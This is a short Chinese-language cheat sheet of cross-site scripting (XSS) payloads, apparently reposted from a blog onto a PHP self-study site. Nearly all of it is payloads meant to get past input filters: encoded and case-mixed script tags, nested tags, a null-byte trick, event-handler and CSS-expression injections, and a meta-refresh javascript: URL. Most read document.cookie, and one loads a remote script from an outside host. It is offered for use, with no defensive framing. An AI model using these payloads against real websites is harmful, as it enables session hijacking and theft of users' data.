基础: "><script >alert(document.cookie)</script> 绕过<script> 标签过滤: %253cscript%253ealert(document.cookie)%253c/script%253e "><s]%2b]cript>alert(document.cookie)</script> "><ScRiPt>alert(document.cookie)</script> "><<script>alert(document.cookie);//<</script> foo%00<script>alert(document.cookie)</script> <scr<script>ipt>alert(document.cookie)</scr</script>ipt> %22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E
在<script>里: '; alert(document.cookie); var foo=' foo\'; alert(document.cookie);//'; </script><script >alert(document.cookie)</script> 无<script>的xxs: <img src=asdf onerror=alert(document.cookie)> <BODY ONLOAD=alert('XSS')> 在ie上可以接受一个样式属性: http://www.2cto.com ?image=s%22%20style=x:expression(alert(document.cookie)) http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS')) http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29 在 FF 假如你可以控制 refresh me标签, 你可以用url注入用javascript: : http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>
xss笔记网站:http://ha.ckers.org/xss. html
作者:L.N.博客
查看更多关于XSS 笔记 - 网站安全 - 自学php的详细内容...